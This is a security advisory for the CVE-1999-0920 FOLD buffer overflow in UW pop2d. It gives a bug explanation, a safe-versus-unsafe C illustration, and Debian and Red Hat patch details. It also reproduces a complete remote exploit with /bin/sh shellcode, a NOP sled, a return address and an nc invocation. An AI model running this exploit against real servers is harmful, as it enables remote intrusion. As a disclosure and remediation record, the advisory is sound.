UW pop2d FOLD Command Remote Buffer Overflow Vulnerability
Release date: 1999-05-26
Updated: 1999-05-26
Affected systems:
University of Washington imap 4.4
- Debian Linux 2.1
- RedHat Linux 5.2
- RedHat Linux 5.1
- RedHat Linux 5.0
- RedHat Linux 4.2
- RedHat Linux 4.1
- RedHat Linux 4.0
University of Washington pop2d 4.4
- Debian Linux 2.1
- RedHat Linux 5.2
University of Washington pop2d 4.51
Unaffected systems:
University of Washington imap 4.5
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 sparc
Description:
BUGTRAQ ID: 283
CVE(CAN) ID: CVE-1999-0920
pop2d (ipop2d) is the open-source POP2 server implemented by the University of Washington and distributed with its IMAP toolkit (the imap package on the affected Linux distributions).
pop2d 4.4 and earlier contain a buffer overflow. A remote attacker can exploit it to execute arbitrary code on the host with the privileges of the "nobody" user.
pop2d and pop3d support an "anonymous proxy" mode: in the HELO command a remote user supplies a host, an account name and a password for some other IMAP server, and pop2d then opens that user's IMAP mailbox on that server on their behalf. Once logged in this way, the argument of the FOLD (select folder) command is copied into a fixed-size stack buffer without a length check, so an overlong folder name overwrites the saved return address (a stack-based overflow). Because pop2d has already switched to uid "nobody" when it handles the proxied session, the attacker gets a shell as nobody rather than root, and the only prerequisite is an account on some IMAP server reachable from the target, which can be a server the attacker runs themselves.
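The following is an added example written for this page, not ipop2d's source. It reconstructs the shape of the bug described above as a small, self-contained C program: a server that proxies to another host must join the HELO host and the FOLD argument into one c-client-style mailbox name ("{host}folder"), and doing that with an unbounded sprintf() into a fixed stack buffer gives exactly the FOLD overflow. The buffer size MAILBOX_MAX, the function names and the sample inputs (the host name from the exploit's usage line, a 1012-byte folder name like the one the exploit sends) are assumptions chosen for illustration. It also shows why the exploit subtracts the host length from its payload size: every byte of host name moves the overwrite point by one.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the server's mailbox-name buffer; illustration only. */
#define MAILBOX_MAX 1024

/* Vulnerable shape (illustrative, not ipop2d's actual code): host and folder
 * are formatted into a fixed-size buffer with no bound on either, so a long
 * FOLD argument writes past the end of the caller's stack buffer.
 * Only ever call this with inputs known to fit. */
static int mailbox_name_unchecked(char *out, const char *host, const char *folder)
{
    return sprintf(out, "{%s}%s", host, folder);
}

/* Hardened form: measure first and refuse rather than truncate. Silent
 * truncation would be a bug of its own here, since a cut-off name could
 * select a different mailbox than the one the client asked for.
 * Returns the length written, or -1 if the name does not fit. */
static int mailbox_name_checked(char *out, size_t outsz,
                                const char *host, const char *folder)
{
    int need = snprintf(NULL, 0, "{%s}%s", host, folder);
    if (need < 0 || (size_t)need >= outsz)
        return -1;
    return snprintf(out, outsz, "{%s}%s", host, folder);
}

/* Bytes the unchecked form would write past a MAILBOX_MAX buffer (0 if it
 * fits). This is the arithmetic behind the exploit's "bsize -= strlen(host)". */
static int fold_overflow_bytes(const char *host, const char *folder)
{
    int need = snprintf(NULL, 0, "{%s}%s", host, folder) + 1; /* +1 for NUL */
    return need > MAILBOX_MAX ? need - MAILBOX_MAX : 0;
}

/* Same check for a constructed folder name of folder_len filler bytes
 * (the content is irrelevant to the overflow; only the length matters). */
static int long_fold_overflow(const char *host, size_t folder_len)
{
    char folder[2048];
    if (folder_len >= sizeof folder)
        return -1;
    memset(folder, 'A', folder_len);   /* constructed filler */
    folder[folder_len] = '\0';
    return fold_overflow_bytes(host, folder);
}

/* Parse a POP2 "FOLD <name>" request line into a bounded buffer.
 * Returns 0 on success, -1 if the line is not a FOLD command, -2 if the
 * argument is too long for the buffer (rejected before any copy happens). */
static int parse_fold(const char *line, char *folder, size_t folder_sz)
{
    if (strncmp(line, "FOLD ", 5) != 0)
        return -1;
    const char *arg = line + 5;
    size_t n = strcspn(arg, "\r\n");   /* argument runs up to the CRLF */
    if (n >= folder_sz)
        return -2;
    memcpy(folder, arg, n);
    folder[n] = '\0';
    return 0;
}

int main(void)
{
    const char *host = "ppp-666.lame.org";   /* host from the exploit's usage line */
    char name[MAILBOX_MAX], folder[64], big[1013];

    parse_fold("FOLD INBOX\r\n", folder, sizeof folder);
    mailbox_name_unchecked(name, host, folder);   /* fits: "{ppp-666.lame.org}INBOX" */
    printf("%s -> overflow %d bytes\n", name, fold_overflow_bytes(host, folder));

    memset(big, 'A', 1012);                       /* constructed 1012-byte FOLD argument */
    big[1012] = '\0';
    printf("1012-byte FOLD argument with host %s -> overflow %d bytes, checked form returns %d\n",
           host, fold_overflow_bytes(host, big),
           mailbox_name_checked(name, sizeof name, host, big));
    printf("same argument with host lame.org -> overflow %d bytes\n",
           long_fold_overflow("lame.org", 1012));
    return 0;
}
```

With the 16-character host the 1012-byte folder name overruns the assumed 1024-byte buffer by 7 bytes, while with the 8-character host "lame.org" it just fits, which is why a real exploit against such a bug has to account for the host length when placing the return address. The checked form refuses the request outright instead of writing anything.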
<*Source: Chris Evans (chris@ferret.lmh.ox.ac.uk)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=92913144323190&w=2
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
/*
* Sekure SDI (Brazilian Information Security Team)
* ipop2d remote exploit for linux (Jun, 02 1999)
*
* by c0nd0r <condor@sekure.org>
*
* (read the instructions below)
*
* Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
* falcon, vader, c_orb, marty(nordo!) and minha malinha!
* also to #uground (irc.brasnet.org) and #SDI (efnet),
* guys at el8.org, toxyn.org, pulhas.org
*
* Sincere Apologies: duke (for the mistake we made with the wu-expl),
* your code rocks.
*
* Usage:
*
* SDI-pop2 <imap_server> <user> <pass> [offset]
*
* where imap_server = IMAP server at your box (or other place as well)
* user = any account at your box
* pass = the account's password
* offset = 0 is default -- increase if it's necessary.
*
* Example: (netcat rocks)
*
* (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
*
* ----------------------------------------------------------------
* HOWTO-exploit:
*
* In order to gain remote access as user nobody, you should set
* an IMAP server at your box (just edit the inetd.conf) or at
* any other machine which you have an account.
*
* During the anonymous_login() function, the ipop2d will set the
* uid to user nobody, so you are not going to get a rootshell.
* ----------------------------------------------------------------
*
* We do NOT take any responsibility for the consequences of using
* this code -- you've been warned! don't be a script k1dd13!
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/*
 * (shellcode)
 *
 * jmp 0x1f
 * popl %esi
 * movl %esi,0x8(%esi)
 * xorl %eax,%eax
 * movb %eax,0x7(%esi)
 * movl %eax,0xc(%esi)
 * movb $0xb,%al
 * movl %esi,%ebx
 * leal 0x8(%esi),%ecx
 * leal 0xc(%esi),%edx
 * int $0x80
 * xorl %ebx,%ebx
 * movl %ebx,%eax
 * inc %eax
 * int $0x80
 * call -0x24
 * .string "/bin/sh"
 * grab your shellcode generator at www.sekure.org
 */
char c0d3[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";

int main (int argc, char *argv[] ) {
    char buf[2500];
    int x, y, offset = 0;
    long addr;
    char host[255], user[255], pass[255];
    int bsize = 986;

    if ( argc < 4) {
        printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
        printf ( "usage: (SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
        exit (0);
    }
    snprintf ( host, sizeof(host), "%s", argv[1]);
    snprintf ( user, sizeof(user), "%s", argv[2]);
    snprintf ( pass, sizeof(pass), "%s", argv[3]);
    if ( argc > 4) offset = atoi ( argv[4]);

    /* gimme the ret + offset */
    addr = 0xbffff3c0 + offset;
    fprintf ( stderr, "0wning data since 0x%lx\n\n", addr);

    /* calculation of the return address position: the overflowed buffer
     * also holds the HELO host name, so every byte of host shifts the
     * overwrite point forward by one */
    bsize -= strlen ( host);

    /* NOP sled, then the shellcode, then the return address repeated
     * (little-endian) up to the overwrite point */
    for ( x = 0; x < bsize - (int) strlen(c0d3); x++)
        buf[x] = 0x90;
    for ( y = 0; y < (int) strlen(c0d3); x++, y++)
        buf[x] = c0d3[y];
    for ( ; x < 1012; x += 4) {
        buf[x ] = addr & 0x000000ff;
        buf[x+1] = (addr & 0x0000ff00) >> 8;
        buf[x+2] = (addr & 0x00ff0000) >> 16;
        buf[x+3] = (addr & 0xff000000) >> 24;
    }
    buf[x] = '\0';   /* terminate the payload so "%s" stops here */

    /* anonymous proxy login: host:user pass, then the overlong FOLD.
     * stdout is a pipe to nc, so flush after each line or both arrive
     * together only at exit and the sleeps are pointless */
    sleep (1);
    printf ( "HELO %s:%s %s\r\n", host, user, pass);
    fflush ( stdout);
    sleep (1);
    printf ( "FOLD %s\r\n", buf);
    fflush ( stdout);
    return 0;
}
Recommendations:
Temporary workaround:
If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:
* Temporarily disable the pop2d service
Comment out the ipop2d line in /etc/inetd.conf:
#pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
Then restart inetd (or send it SIGHUP) so that it rereads its configuration; connections to port 109 will be refused from then on. Note that this only removes the POP2 entry point: the imap package itself still needs the vendor upgrade below.
Vendor patches:
Debian
------
The vendor has released an upgrade to fix this security issue; download it from the vendor's site and verify the MD5 checksums listed below before installing:
Source archives:
http://security.debian.org/dists/stable/updates/source/imap_4.5-0slink2.diff.gz
MD5 checksum: 606f893869069eee68f4c1e31392af29
http://security.debian.org/dists/stable/updates/source/imap_4.5-0slink2.dsc
MD5 checksum: 93ed80a3619586ff9f3246003aca2448
http://security.debian.org/dists/stable/updates/source/imap_4.5.orig.tar.gz
MD5 checksum: 59afe4be5fcd17c20d241633a4a3d0ac
Sun Sparc architecture:
http://security.debian.org/dists/stable/updates/binary-sparc/c-client-dev_4.5-0slink2_sparc.deb
MD5 checksum: 2de5363a3ea9f27c1aa064c3102567cc
http://security.debian.org/dists/stable/updates/binary-sparc/imap_4.5-0slink2_sparc.deb
MD5 checksum: 87638b6ad06094f30ff6d2dddfd10b8b
http://security.debian.org/dists/stable/updates/binary-sparc/ipopd_4.5-0slink2_sparc.deb
MD5 checksum: aa6621e2f7e2df751489c397e9e169a8
Intel ia32 architecture:
http://security.debian.org/dists/stable/updates/binary-i386/c-client-dev_4.5-0slink2_i386.deb
MD5 checksum: fd92656c7281a4d8322b6da1285475cd
http://security.debian.org/dists/stable/updates/binary-i386/imap_4.5-0slink2_i386.deb
MD5 checksum: c92eaece7e431c84708909362afad07d
http://security.debian.org/dists/stable/updates/binary-i386/ipopd_4.5-0slink2_i386.deb
MD5 checksum: 29685847b0eef8307383a428b1d02be2
Motorola 680x0 architecture:
http://security.debian.org/dists/stable/updates/binary-m68k/c-client-dev_4.5-0slink2_m68k.deb
MD5 checksum: eeab449299e9f2d3fc97db69110b4432
http://security.debian.org/dists/stable/updates/binary-m68k/imap_4.5-0slink2_m68k.deb
MD5 checksum: 4bd0fbaa392b6013f6caa33b04578764
http://security.debian.org/dists/stable/updates/binary-m68k/ipopd_4.5-0slink2_m68k.deb
MD5 checksum: d43f502971afc531923903f3ac7b5b3f
Alpha architecture:
http://security.debian.org/dists/stable/updates/binary-alpha/c-client-dev_4.5-0slink2_alpha.deb
MD5 checksum: 6732ae9495ee29590ed85cc482fbda97
http://security.debian.org/dists/stable/updates/binary-alpha/imap_4.5-0slink2_alpha.deb
MD5 checksum: d0ee05b972d5d1bc1d066e2bae4d8c8b
http://security.debian.org/dists/stable/updates/binary-alpha/ipopd_4.5-0slink2_alpha.deb
MD5 checksum: 89c3931092537d0eb23fb50fa57f1bb0
RedHat
------
The vendor has released an upgrade to fix this security issue; download it from the vendor's site:
Red Hat Linux 4.x:
------------------
On alpha:
rpm -Uvh ftp://updates.redhat.com/4.2/alpha/imap-4.5-0.4.2.alpha.rpm
On i386:
rpm -Uvh ftp://updates.redhat.com/4.2/i386/imap-4.5-0.4.2.i386.rpm
On sparc:
rpm -Uvh ftp://updates.redhat.com/4.2/sparc/imap-4.5-0.4.2.sparc.rpm
The source is available at
ftp://updates.redhat.com/4.2/SRPMS/imap-4.5-0.4.2.src.rpm
Red Hat Linux 5.x:
------------------
On alpha:
rpm -Uvh ftp://updates.redhat.com/5.2/alpha/imap-4.5-0.5.2.alpha.rpm
On i386:
rpm -Uvh ftp://updates.redhat.com/5.2/i386/imap-4.5-0.5.2.i386.rpm
On sparc:
rpm -Uvh ftp://updates.redhat.com/5.2/sparc/imap-4.5-0.5.2.sparc.rpm
The source is available at
ftp://updates.redhat.com/5.2/SRPMS/imap-4.5-0.5.2.src.rpm